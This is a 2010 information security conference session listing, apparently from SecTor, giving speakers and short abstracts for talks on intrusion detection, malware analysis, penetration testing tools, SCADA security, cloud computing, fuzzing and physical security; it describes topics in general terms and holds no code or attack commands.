Sessions - 2010

Tech Track

Management Track

Turbo Track

Tech Track

Management Track

Turbo Track

Sponsor Track

KeyNotes -

Attribution for Intrusion Detection - Greg Hoglund

With today's evolving threat landscape, and the general failure of AV to keep bad guys out of the network, effective intrusion detection is becoming extremely pertinent. Greg will talk about using attribution data to increase the effectiveness and lifetime of intrusion detection signatures, both host and network. Within host physical memory, software in execution will produce a great deal of clear text related to behavior, command and control, and API usage - most of which is not readily available from captured binaries or disk acquisitions. Some of this available data relates to how malware was written - the actual source code used. Other data may include forensic toolmarks left by a compiler and even the native language pack used by a developer. Many of these indicators do not change very often - the attackers will reuse source code and development tools that same way that any normal software developer does. These indicators are extremely effective at detecting intrusions in the enterprise, especially when combined together. In this way they become a form of attribution - a way to fingerprint individual threat actors. Some of these indicators can even be used to make network security products more effective - for example the DNS names used for command and control. Protocol level information can even be decoupled from DNS and result in NIDS signatures that work even when the attackers rotate their DNS points. Greg will discuss how to analyze host systems, including physical memory, raw disk, and timeline information, to detect intrusions using attribution data. Greg will also discuss how to locate and extract attribution data from captured malware and compromised systems.

Today’s Face of Organized Cyber Crime: A Paradigm for Evaluating Threat - Steve Kelly

Traditional organized crime syndicates and urban street gangs are well understood by law enforcement officials. They have a hierarchy, defined geographic area of influence, and established business model. Cyber criminals, however, are more difficult to categorize. Mr. Kelly will deconstruct “organized” cyber crime and explore a new paradigm for evaluating the threat it poses to users of computer networks.

The Problem with Privacy is Security - Tracy Ann Kosa

Privacy advocates tend to spend a lot of time refuting the high profile discussions about the pending death of privacy, particularly online. This focus would be better spent addressing the cause: security. Identifiable information about us pops up in places you wouldn't expect, leaving a detailed virtual trail. Security mechanisms force the recording, monitoring and auditing of that information in the interest of protecting us from some unseen enemy. Resulting breaches, be it by good guys or bad guy, are covered by the media with some combination of shock and awe. Is it possible to build a better mousetrap? It will probably be expensive, definitely time consuming, and starts with rethinking how the systems we've created to serve us have become the masters.

Involuntary Case Studies in Data Security -  Mike Rothman

It is absolutely backwards, but while the bad guys constantly share details of their exploits, including techniques, when it comes to real incidents, actual defenders rarely talk about what worked, and what didn't. In this session, Mike Rothman will name names as he builds in-depth case studies based on publicly available information, some of which isn't overly public. He will combine these with the latest information from breach reports and other statistical sources to build a picture of how real breaches happen, which security controls really work, and which compliance checkboxes are a complete and total waste of time.

Sessions -

Microsoft’s cloud security strategy - Mohammad Akif

As the adoption and interest in cloud computing grows, technical and business decision-makers are trying to assess the risk associated with using the cloud infrastructure. Join Mohammad Akif, the National Security and Privacy Lead for Microsoft Canada to learn about the threat landscape for cloud computing and how the industry in general and Microsoft in particular plans to address these concerns.

Do it yourself - Security Assessments made easy and FREE - John Andreadis

With the continuing changing threat landscape and continuous demands on compliance to regulatory standards, InfoSec Administrators are continuously playing catch-up to keep their systems safe - John will show you 5 easy ways to assess your systems while staying within your zero budget.

SCADA and ICS for Security Experts: How to avoid cyberdouchery - James Arlen

The traditional security industry has somehow decided that they are the white knights who are going to save everyone from the horror of insecure powergrids, pipelines, chemical plants, and cookie factories. Suddenly, every consultant is an expert and every product fixes SCADA. And because they don't know what the hell they're talking about -- 'fake it till ya make it' doesn't work -- they're making all of us look stupid.

Gates, Guards, and Gadgets: An Introduction to the Physical Security of IT - Kai Axford

We're all familiar with using a defense-in-depth strategy when planning information security, but none of that matters if I can take your datacenter and load it into my truck! Join Kai Axford, a Certified Protection Professional (CPP), as he looks at the various aspects of physical security, such as barrier planning, IP surveillance, lock selection (and of course, lockpicking!) Expect plenty of demos and the chance to see most of this stuff in operation.

Starting an InfoSec Company: Three Founder’s Stories - Robert Beggs, Dave Millier, Brian O'Higgins, Eldon Sprickerhoff

Ever wonder what it’s like to start your own InfoSec company? Join our “InfoSec Corporate Founders’ Panel” as they trade war stories, describe strategies and mishaps, and offer advice.

Crime & Carelessness: Gaps that Enable the Theft of Your Most Sensitive Information - Ryan Boudreau

"Information is power and money. Our professional lives revolve around building, inventing and working with more valuable information. How we protect and manage this information is core to the success of our economy, organizations, corporations and our personal lives. In this presentation we will explore how a criminal industry now larger than the international drug trade works to steal our information. Targeting areas of operational weakness, these organizations effectively steal more than $600 Billion of information every year. There are best practices to follow and we will discuss ways in which technology, process and education can greatly hinder what will continue to be an active attack on our most valuable resource: information."

Join Ryan Boudreau and learn how Symantec is leading the world in Prioritizing Data Protection.

Building the DEFCON network, making a sandbox for 10,000 hackers - David Bryan and Luiz Eduardo

David covers how the DEFCON network team builds a network from scratch, in three days with very little budget. How this network evolved, what worked for him, and what didn’t work over the last ten years. This network started as an idea, and after acquiring some kick butt hardware, has allowed them to support several thousand users concurrently. In addition David will cover the new WPA2 enterprise deployment, what worked, and what didn’t, and how the DEFCON team is going to make the Rio network rock!

Dissecting the Modern Threatscape: Malicious Insiders, Industrialized Hacking, and Advanced Persistent Threats
- Brian Contos

This is an intermediate to advanced level presentation that pulls from McAfee Labs research as well as real-life customers. This is original content designed to paint a clear picture of today’s threat landscape and through doing so illustrate the differences between insider threats, industrialized hackers, and APTs. Attacks are coming from all angles. In some cases they are very rudimentary; in others they are highly complex. Organizations must be able to protect themselves regardless, and do so in a way this is in parity with business operations, maintains employee and partner agility, and is manageable without the complexity of the solution being worse than the attack itself. Failure to address these three different attack types can result in everything from diminished brand loyalty, regulatory penalties, and lost revenue, to stolen intellectual property, economic competitive disadvantage, and military competitive disadvantage.

Cloud definitions you’ve been pretending to understand - Jack Daniel

We’ve all heard talks where we nodded in agreement with the speaker when he or she launched into jargon we didn’t comprehend. In this talk Jack, assisted by sock puppets, will explain common cloud computing terminology and discuss some common misconceptions about cloud computing.

64-bit Imports Rebuilding and Unpacking - Sébastien Doucet

64-bit malware are coming! 64-bit malware are coming! I’ve been repeating this for the last 2 years; it’s not tinfoil hat talk anymore. With 64-bit packers and protectors being released, there is presently a growing need to create new tools to facilitate the manual unpacking process for malware analysis and to make it as trivial as it is now for protected 32-bit executables. Accordingly, I will be showcasing two tools: CHimpREC and CHimpREC-64, allowing the spirit of ImpREC (now obsolete imports rebuilding tool) to live on under the best possible compatibility with all the x64 versions of the Windows operating system. This presentation will uncover the inner-workings of coding a 32-bit imports rebuilder and the problems encountered due to the WoW64 environment and Address Space Layout Randomization. Additionally, I will provide an overview of the differences between the PE and PE32+ formats and their impact on porting CHimpREC to 64-bit.The presentation will conclude with 2 or 3 short live unpacking sessions with different examples of 64-bit packers and how trivial it has become to deal with them with the help of CHimpREC-64, demonstrating that obfuscation by obscurity is not an excuse anymore to ignore 64-bit malware.

SDL Light: A practical Secure Development Lifecycle for the rest of us - Marisa Fagan

Security companies are beginning to attack the problem of software vulnerabilities at the source, the development process. Secure coding programs like Microsoft SDL, OWASP SAMM, and BSIMM save the organization money and time by taking the bugs out at the beginning, and avoid costly incident response nightmares. Chris Wysopal, CTO at Veracode, says "Many of these methodologies are fairly new. Many development organizations don't have the process rigor or the resources to do anything more formal than use one tool or service as part of the development lifecycle." A survey done by Errata during RSA shows there is a great demand in the industry for making these secure coding programs more affordable and less resource intensive.

Unidirectional Connectivity as a Security Enabler for SCADA and Remote Monitoring Applications - Lior Frenkel

Network segregation (also called “air-gapping”) is considered a foolproof method for protecting networks from external attacks or from data theft/leakage. Unfortunately, employing this method mandates users to forego all benefits of connectivity; hence this method is not acceptable today as a viable security means.

Unidirectional connectivity, hardware enforced over all layers of communications, is an interesting compromise between full connectivity and full segregation. Unidirectional Security Gateways are now becoming a viable option for securing SCADA and other industrial and critical networks.

This session will review the existing security postures evident in SCADA networks and then introduce the concept of unidirectional connectivity. A detailed analysis of the advantages and limitations of unidirectional connectivity-based security solutions will be presented, containing resulting SCADA network architectures created when employing unidirectional connectivity security means. Additional analysis will be provided regarding the effects and requirements that unidirectional connectivity imposes on the methodology and use of SCADA applications employed on such networks. In addition, This session will discuss compliance concerns with specific reference to NERC and NRC regulations.

Sharingan – A Ninja art to Copy, Analyze and Counter Attack - Mrityunjay Gautam

Many products in the industry have or use some kind of a proprietary network protocol. Most of these protocols do not have packet level documentation in place; neither with the development team, nor with the architect. In some instances, security assessment team/auditor might be dealing with a network protocol which a third party wrote and our organization has deployed in the intranet. When the security auditor/group is faced with the problem to assess the security robustness of these protocols, he or she can either do a blind fuzzing or we can capture the communication over the wire and do a manual analysis to find patterns in the various packets. The first approach is not very effective for most protocols and the second approach takes extensive time. The question is – how do you deal with a multitude of such protocols which are built in various products being developed or deployed (third party products) by your company?

This session presents the implementation level design and demonstration of a tool which addresses this problem and automates the entire process. The tool would be sniffing packets from the wire; analyzing the packets using artificial intelligence algorithms and heuristics to find the structure of the packet; generating custom intelligent fuzzers from the derived structural information specific to this protocol. The only manual step is to point the fuzzer to the targeted protocol and get information on its security robustness status. This session is intended to demonstrate an idea which is currently (in the demo) being applied to Network Protocol only but this can as well be used on File Formats for automated file fuzzer generation. The idea here is that with this tool in place, the overall security posture of the organization would get significantly improved. Also the products being shipped out by the company would be better in the network level security robustness.

Mastering Trust: Hacking People, Networks, Software, and Ideas. - Pete Herzog

Why can't we make the right decision all the time? Our sense of trust is broken. Lies, deceit, fraud, and insinuations make up a large part of crime for a reason. We are bad at trust. It's in our biology. It's why we sometimes make the wrong friends, date the wrong people, buy the wrong car, and do things that in retrospect were really really dumb. Now consider the fact that trust makes up the majority of security decisions from who you let in to what you connect to and you see we have a very big problem. This talk shows you how we are broken, how to analyze and test trusts, how the ISECOM trust metrics work, how they are used to replace risk assessments in many organizations, and how they can help you make better overall decisions.

CLOUDINOMICON: Idempotent Infrastructure, Survivable Systems & Bringing Sexy Back to Information Centricity - Chris Hoff

Mass-market, low-cost, commodity infrastructure-as-a-Service Cloud Computing providers abstract away compute, network and storage and deliver hyper-scaleable capabilities.

This "abstraction distraction" has brought us to the point where the sanctity and security of the applications and information transiting them are dependent upon security models and expertise rooted in survivable distributed systems, at layers where many security professionals have no visibility.

The fundamental re-architecture of the infostructure, metastructure and infrastructure constructs in this new world forces us back to the design elements of building survivable systems focusing on information centricity -- protecting the stuff that matters most in the first place.

The problem is that we're unprepared for what this means and most practitioners and vendors focused on the walled garden, perimeterized models of typical DMZ architecture are at a loss as to how to apply security in a disintermediated and distributed sets of automated, loosely-coupled resources.

We're going to cover the most salient points relating to how IaaS Cloud architecture shifts how, where and who architects, deploys and manages security in this "new world order" and what your options are in making sustainable security design decisions.

Malware Freakshow 2010 - Jibran Ilyas and Nicholas J. Percoco

We had a busy year. We investigated over 200 incidents in 24 different countries. We ended up collecting enough malware freaks [samples] to fill up Kunstkammer a few times over. Building upon last year's DEFCON talk, we want to dive deeper and bring you the most interesting samples from around the world - including one that made international headlines and the rest we're positive no one's ever seen before (outside of us and the kids who wrote them). This talk will bring you 4 new freaks and 4 new victims including: a Sports Bar in Miami, Online Adult Toy Store, US Defense Contractor, and an International VoiP Provider. The malware we are going to demo are very advanced pieces of software written by very skilled developers. The complexity in their propagation, control channels, anti-forensic techniques and data exporting properties will be very interesting to anyone interested in this topic.

Google's approach to malware on the web - Fabrice Jaubert

This talk looks at how Google searches for malware on the web, and how those findings are made available through the public SafeBrowsing API. We will describe the mechanisms by which malware is generally distributed, and how Google detects infected and malicious websites. Finally, we will discuss some of the newer trends we have seen in our study of malware on the web.

How I Met Your Girlfriend - Samy Kamkar

How I Met Your Girlfriend: The discovery and execution of entirely new classes of Web attacks in order to meet your girlfriend. This includes entertaining and newly discovered attacks including PHP session prediction and random numbers (accurately guessing PHP session cookies), browser protocol confusion (turning a browser into an SMTP server), firewall and NAT penetration via Javascript (turning your router against you), extracting extremely accurate geolocation information from a Web browser (not using IP geolocation), and more.

400 Apps in 40 Days - Sahba Kazerooni and Nish Bhalla

You are an information security practitioner who finds them self responsible for the security of their organization’s data. From an application perspective you are most likely looking at hundreds, if not thousands, of internet-facing domains. How do you prioritize one over another? How do you do this on-time and on-budget? This presentation aims to provide answers to these classic challenges. Sahba Kazerooni and Nish Bhalla will present a real-world case study where the requirement is simple: Reduce the risk to an organization from all external-facing applications. The discussion is interwoven with lessons of attack surface discovery, risk analysis and application assessment methodology.

Building your own secure U3 launchable Windows forensic toolkit - Jason Kendall

This toolset attempts to provide a easy to use U3 drive to gather forensic data from a windows computer. The entire toolset is located on the read-only portion of the U3 drive, and reports are writen to the writeable portion.

Into the Black: Explorations in DPRK - Mike Kemp

North Korea scares people. Allegedly DPRK has a super l33t squad of killer haxor ninjas that regularly engage in hit an run hacks against the Defense department, South Korea, or anyone else who pisses of the Glorious Leader. DPRK also has no real Internet infrastructure to speak of (as dictators don't like unrestricted information), although it does have a number of IP blocks (unused?). This talk examines some of the myths about DPRK, and some of their existing and emerging technologies. This talk also examines some of the available infrastructure associated with DPRK (funnily enough some of which is in South Korea and Japan) and explores the potential technical threats posed by a pernicious regime, as well as exposing some of the huge gaps in logic that have led to the world potentially engaging in chicken little syndrome when it comes to DPRK. No 0days will be demonstrated, however this talk will discuss some new information that hasn't yet been made public, and will hopefully call time on the whole 'cyberwar' sideshow.

IPv6, for worse or better - Joe Klein

It is about to happen: the long promised upgrade from IPv4 to IPv6 is on our doorstep. The initial reason for this change of the Internet's layer 3 protocols was to head off the projected 2010-2012 depletion of IPv4 reported back in 1994. As a stop-gap method until IPv6 was fully deployed, the Internet Engineering Task Force (IETF) chose to implement many standards which were intended to first extend the life of the address space and second help the transition to native IPv6-only networks. In addition, the IETF decided to reengineer the protocol, adding many features which will make Internet communications easier, more robust, flexible, agile, lighter weight and secure. But within these decisions lay unintended consequences to security.

This presentation will discuss the deeper justification of moving to native IPv6, decisions along the way which made IPv4 more difficult to secure, the impact of transition protocols to connect the "Islands of IPv6 across seas of IPv4"/"Islands of IPv4 across seas of IPv6", failure by the security and IT vendors provide parity with IPv4/IPv6 tools which leave network vulnerable, and local network fails built into the protocol. Finally, the vast majority of security professionals and hackers assume that IPv6 is just like IPv4, it is not, therefore we will discuss how to connect, operate, penetrate and secure IPv6 enabled systems.

What's Old Is New Again: An Overview of Mobile Application Security - Zach Lanier and Mike Zusman

The ever-increasing prevalence of mobile devices brings with it a slew of security problems. Applications running directly on mobile devices (and web apps optimized for mobile clients) are ripe for the picking even by unsophisticated attackers. The attack classes that once applied to traditional network-facing, fat client, and web applications are now valid for mobile apps, as well. Insecure authentication and access control; home-grown crypto; and memory management problems are just some of the issues resurfacing on this new frontier. This presentation will discuss the security of some of the most popular applications running on mainstream mobile platforms such as Android, iPhone, Blackberry, and Windows Mobile.

Emerging Threats, The Battle for the Access edge - Mark Townsend

Your network is under attack. Malware, Trojans, Botnets and host of other threats are alive and well in the Internet. The people who produce these threats have a new target -- the wired and wireless edges of your network. To effectively detect and manage these threats you need a management platform that provides a single integrated view of both the wired and wireless infrastructures. With fast moving worms able to scan and infect thousands of systems in a few seconds, Network Administrators need to be able to quickly deploy new security policies to the entire infrastructure. Find out how the Enterasys solution provides an integrated management view for both the wired and wireless infrastructures. This integrated view enables network administrators to easily deploy fine grained security and class of service controls to the entire infrastructure with a single click. Enterasys solutions are standards-based and fully interoperable with all major networking vendors. Compliance requirements are addressed efficiently. Mission critical services are protected and the threats are controlled.

Metasploit Tips and Tricks - Ryan Linn

There are tons of tutorials to get started with Metasploit but have you ever wanted some tips to help use the framework more efficiently? This presentation will cover some tricks to help get the most out of Metasploit. You will see demonstrations and learn how to build payloads within Metasploit, use the database effectively, pivot between protected systems, and perform additional discovery from already compromised machines. Each demonstration will show the steps from start to finish so these techniques can be applied directly in your environment.

Into the Rabbit-Hole - Rafal Los

Since the caveman first fashioned a spear humans have been using tools to make them more efficient and effective. Unfortunately, today's analysts often misunderstand the role tools play testing web applications. While tools can be quite good at mapping a web application's attack surface there is still much human analysis that must be done to find the elusive defects that lie just below the surface. That human analysis is daunting and irregular ... until now.

The answer is an execution-flow-based approach to application security testing. By first understanding application logic and execution flow it is possible to completely map a web application's attack surface, and therefore fully test the application. Along the way we will cover understanding the principles of application-flow analysis, application process mapping and building execution-flow diagrams (EFDs) which together form a complete picture of the web application and allow an analyst to do a thorough job. This talk focuses on how to get the whole picture of the application by mapping logic and execution flow of the application and uncovering potentially critical defects.

Beyond Aurora's Veil: A Vulnerable Tale - Derek Manky

In 2009, the Conficker worm was dissected by researchers, and then fried by the spotlight on a worldwide stage. One year later, we saw the Aurora assaults similarly glow in the headlines. Defense was tense against these two nasties – yet, in each case, easily circumvented by two potent zero-day exploits that crept in from the digital depths. Derek Manky will provide case studies on the zero-days, along with live demonstrations.

Manky will go on to highlight drive-by attacks launched during Conficker's rise, which have provided growth to one of today's largest botnets – Bredolab. He will show sophisticated techniques and structure Bredolab has developed over the course of a year. Illuminating their shadows, Manky will unveil these threats in order to provide insight and provoke thought for a broader defense strategy, instead of using reactive tunnel-vision that is all too common.

Black Berry Security FUD Free - Adam Meyers

As mobile computing devices proliferate the enterprise more 'security' conscious people are raising flags about mobile device security. One device which is dominant in the enterprise mobile computing world is the ubiquitous Blackberry(TM), which has quite a bit of Fear Uncertainty and Doubt surrounding it and its security controls. Rumors about blackberry compromises and confusion about remote access toolkits for the Blackberry run amuck in many circles. This presentation aims to set the facts straight by going right to the source - literally - in an effort to dispel FUD about the device, we will look to Research In Motion (RIM) documentation, API, and SDK to enumerate the facts and squash the FUD. The presentation will also explore the Printed Circuit Boards (PCB) in several devices to examine the architecture and chip sets, and a disassembled operating system will be examined as well.

A Day in the life of APT - Adam Meyers

The term 'Advanced Persistent Threat" has dominated the cyber security world for the last several years. This marketing construct is designed to describe a real and widespread threat, but seems to cause confusion and mockery. This presentation will cut through marketing hyperbole to walk through an attack by a sophisticated actor demonstrating the tools and techniques of one APT incident and providing insight into defensive techniques and tools which may aid the network defender.

Realize More Value From Your Existing security Tools - Dave Millier

Dave Millier will talk about leveraging information gathered from various sources (security and system logs, reports, processes, and directly from people), and turning them into meaningful reports and dashboards that can be used to track compliance around various standards and regulations, including PCI, CobiT, SOX, NERC CIP, and others. Rather than focusing on any particular technology, Dave will explain how companies can get more value out of the existing security tools they’ve invested in, how to provide metrics that are meaningful, and how to build reports that are actually useful for various levels within an organization, from C-Level executives, right down to the firewall administrators, and even end users.

Beyond Exploits: Real World Penetration Testing - HD Moore

This presentation focused on abusing design flaws, configuration errors, and information leaks to gain access to typical environments. The open source Metasploit Framework will be used as a demonstration platform to illustrate how low-risk information leaks can be combined to gain administrative access to a target network.

Metasploit Pro – An HD Moore Production - HD Moore

Join Metasploit founder and Rapid7 CSO, HD Moore, to learn about Metasploit Pro, a new commercial penetration testing tool based on the open source Metasploit Framework. Metasploit Pro’s graphical user interface enables ethical hackers to quickly and easily launch simultaneous, sophisticated attacks against several targets. Metasploit Pro automates common tasks such as smart bruteforcing, evidence collection and reporting to speed up your pen testing assignments.

How Many Vulnerabilities? And Other Wrong Questions - David Mortman

At every security conference there's always a group of people asking which is more secure, Windows or Mac, Apache or IIS, IE, Chrome or Firefox. Viewing security solely as a question of vulnerabilities is liking judging a bread solely on how many slashes the baker put on top of it. It just doesn't matter. It's not about which has more patches or which has more vulnerabilities. The questions is actaully which one will cost you the least amount of time and money to consistently manage well. InfoSec is a cost center and security incidents cost money. If we're going to cut costs and make infosec more efficient we need to actually focus on where the money is being spent and not on where it's sexiest to look. We're so focused on the "cool" that we're overlooking the need to do. This pragmatic talk will give you what you need to do your job better and at a lower cost. It will also get you homemade bread.

The Four Types of Lock - Deviant Ollam

Physical security is an oft-overlooked component of data and system security in the technology world. While numerous ratings and standards exist in order classify specific security hardware, many of these standards are ill-defined and poorly-understood. Do you know what makes a "hardened" or "contractor grade" lock special? What does the phrase "high security" signify on hardware packaging? As it turns out, many of these terms are just for show... but Deviant will walk you step-by-step through some distinct and easy-to-follow examples of how low-grade locks can fail as well as how to clearly identify quality equipment. Additionally, we will cover the more difficult matter of hardware purchase decisions at the highest levels... fine distinctions such as which locks belong on the CEO's office versus which ones to use on your server rooms. Every situation calls for something a bit different, and those differences add up when you're spending $100 or more per lock. Make your money count and keep your budget, and your data, secure.

Securing your network with open-source technologies and standard protocols: Tips & Tricks - Nick Owen

We continually are asked “Does your product work with VPN X?”. This is the wrong question. The right question is whether any product on your network supports the authentication protocol you have chosen as a standard. Once you decide on a standard, the world opens up to you. Specifically, the world of open source software. After briefly discussing authentication protocols I will demonstrate how easy it is to protect various software packages and remote access solutions with two-factor authentication, such as SSH, Apache, OpenVPN, FreeNX, etc. Many people are simply not aware of the open-source remote access solutions available and still more are not aware of how to integrate them into a network. This talk seeks to rectify that.

Inside the Malware Industry - Garry Pejski

Not much is known about the malware industry and how it makes money. This talk will break the silence and expose the shady techniques used to create and spread this software, all from the perspective of someone who worked there.

Culture Shift: Social Networking and Enterprise Environments (Security Risk vs Reward) - John W. Pirc

Social networking for most of us is becoming wrapped into our DNA. This is especially important for the next generation workforce. Additionally, the employees today and those of tomorrow will expect the capability to blog and social network with corporate assets and corporate bandwidth. Additionally, these technologies are being widely used for corporate marketing and communication. That’s why it’s important to look at all aspects of securing your infrastructure and more importantly, the people that drive your organization today. This involves educating people, corporate process and the right security technologies. The following session will cover the benefits and the security risks inherit with social networking across all business verticals.

Sniper Forensics v2.0 - Target Acquisition - Christopher Pogue

Last year at SecTor, Christopher debuted "Sniper Forensics", which illustrates how to use live analysis techniques to improve the efficiency and accuracy of forensic investigations. Since then Sniper Forensics has been given at two other computer security conferences! Now, Sniper Forensics v2.0 Target Acquisition will cover the most asked questions asked by the audience members from Sniper Forensics. Where do I begin? What questions do I ask? How do I know when I have a target? How do I integrate my findings into my report? How do I use Sniper Forensics to run my investigation? These questions and others will be addressed!

Web Application Payloads - Andrés Pablo Riancho

This talk will introduce attendees to the subject and show a working implementation of Web Application Payloads that uses the "system calls" exposed by vulnerable Web Applications to collect information from, and gain access to the remote Web server. The Web application payloads implementation was developed as a part of the w3af framework, an open source Web application attack and audit framework developed by contributors around the world since 2007 and lead by Andrés Riancho (the speaker) since its conception.

Involuntary Case Studies in Data Security - Mike Rothman

It is absolutely backwards, but while the bad guys constantly share details of their exploits, including techniques, when it comes to real incidents, actual defenders rarely talk about what worked, and what didn't. In this session, Mike Rothman will name names as he builds in-depth case studies based on publicly available information, some of which isn't overly public. He will combine these with the latest information from breach reports and other statistical sources to build a picture of how real breaches happen, which security controls really work, and which compliance checkboxes are a complete and total waste of time.

Through these case studies you'll learn:

• From your peers through real-world examples of breaches, some of which haven't been publicly reported or widely discussed
•  What security controls can really protect you during an incident
•  How breaches happen and ways you can prevent breaches to your organization
•  How to prioritize your security efforts to be most prepared for preventing or worst case dealing with an incident

Smashing the stats for fun and profit v.2010 - Ben Sapiro

“Smashing the stats for fun and profit v.2010” (or how to convince your boss to spend properly on security)

We all know that security vulnerabilities need to be fixed but it can be hard to convince your employer that you deserve a budget so you can do your job properly.

Using research from the 2010 Canada wide security survey, we'll explore (FUD and vendor Free) the following topics:

• Do people still forget about application security?
• Which approaches work in getting the business to understand security issues?
• How much should you spend on security?
• What’s the right way to identify security problems in your environment so they get fixed

The talk will cover the all new 2010 survey data together with unique content for SECTOR attendees.

top

Fuzzing Proprietary Protocols - A Practical Approach - Thomas Pröll

Proprietary protocols are commonly used in industrial environments and are hard to fuzz. Often, one product like a railway control centre communicates over more than 10 proprietary protocols. Usually, external attackers do not have the specifications of the protocols to write suitable fuzzers. The same applies to internal penetration testers. Even with the specifications, time and budget is not sufficient to implement an effective fuzzer. Commercial fuzzers are also out of the race for the same reasons. With inline fuzzing, even those protocols can be tested.

Today’s Reality: Living in Compromise to Advanced Persistent Threats - Charlie Shields

Today's network advanced persistent threats by definition evade detection by perimeter defenses and current concepts for defense in depth - whether you know it or not. Most organizations have developed an over-reliance upon network-layer, perimeter focused solutions that require signatures or profile-based foreknowledge of a given technical threat. As proven through numerous security breaches over the last few years, most signature and log -based security solutions are already entirely obsolete by the very definition of focused adversary methods. Other architectures currently being deployed are based upon statistical analysis of netflows and other network-layer telemetry providing limited and incomplete network visibility.

This session focuses on the true nature and sources of today's difficult threats, and describes solution characteristics, both technology and operations-related, which are required to detect these invisible threats. Mr. Shields will demonstrate techniques that will enable your organization to detect and stop designer malware, zero-day attacks, and non-signature-based threats to improve overall network visibility, and to detect the leakage and exfiltration of valuable organizational data. The session will cover actual technical case studies from the commercial and public sector to illustrate more effective operational methods for monitoring enterprise infrastructures at the application and content/context layers by performing advanced analysis of full packet captures.

Distributed Denial of Service: War Stories from the Cloud Front - Michael Smith

Due to the rise of large-scale botnets, Distributed Denial of Service (DDoS) is making a resurgence, both in attacker capabilities and the impact on target organizations. This presentation is an overview of DDoS attacker capabilities and techniques, defenses against attacks, and lessons learned from responding to numerous DDoS attacks.

The session will cover a very brief description of the Akamai distributed network and a discussion of the history of Akamai's involvement with DDoS mitigation. The session will then dive into the following areas: threat capabilities and tactics, failure patterns during a DDoS attack, preparation prior to an attack, example timelines associated with the July 4th, 2009 attack, and the active response to an ongoing, targeted DDoS attack. Each area will focus on lessons learned that organizations can reproduce in their own environment.

Barcodes: Read it, Write it, Hack it - Michael Smith

Barcodes are everywhere and we’re seeing more and more of them, from the RealID specification to airline boarding passes to beer bottles. This presentation is designed to be a presentation and hands-on workshop for experimentation with barcode readers, writers, and techniques for hacking in that gray area between software, hardware, and the physical world. The presenter will bring software, tools, and a wide variety of examples including his world-famous QR temporary tattoos.

By The Time You've Finished Reading This Sentence, “You're Infected” - Eldon Sprickerhoff

This talk is intended to be a rapid-fire description of 25 tactics currently used by "the bad guys" so that malware STILL evades AV, web reputation filters and IDP systems and practically any defense thrown at it. Malicious content continues to be a thorn in the side of practically all Internet users. This talk will show the progression of obfuscation techniques, and offer insight into the new infiltration methods expected in the future - ripe with amusing real-world examples of tactics.

BLINDELEPHANT: Web Application Fingerprinting with Static Files - Patrick Thomas

Well-known web applications are used for many purposes such as blogging, forums, e-commerce, database management, email and myriad others. Vulnerabilities in these applications (and their plugins) are discovered at an accelerated rate and are abused for site defacement and increasingly to serve malware.

Website administrators need to keep track of the versions of these web applications installed and update them to a non-vulnerable release. Static file fingerprinting is a technique to identify the version of a remote web application through only its publicly available resource files. The presentation will detail the steps in this fingerprinting process as implemented in the newly released BlindElephant open source tool, including full automation from database seeding to remote probing. The talk will also share results of an internet-wide survey of a million sites, and describe trends in user patch/update behavior and implications about effective (and ineffective) ways to motivate end users.

How do we prevent, detect, respond and recover from CRM failures?
- Kelly Walsh

In this session Kelly compares customer relations breaches with security breaches, specifically their impacts on organizations. Kelly will then compare Security incident response/handling phases to Customer Relations Breaches (detection, response and recovery), and using examples from personal experience discuss how each of these phases plays a role in effective and successful CRM. He concludes the session with a proposed answer to the original question - that by applying established security risk management methodologies we can reduce the risk of poor CRM and customer relations breaches.

OMG-WTF-PDF - Julia Wolf

Ambiguities in the PDF specification means that no two PDF parsers will see a file in the same way. This leads to many opportunities for exploit obfuscation.  PDFs are currently the greatest vector for drive-by (malware installing) attacks and targeted attacks on business and government. A/V technology is extraordinarily poor at detecting these. [Well except for my company of course, we detect them all.] The PDF format itself is so diverse and vague, that an A/V needs to be 100% bug-compatible with the parser in the vulnerable PDF reader. [Not that there are any A/Vs which actually parse PDFs yet.]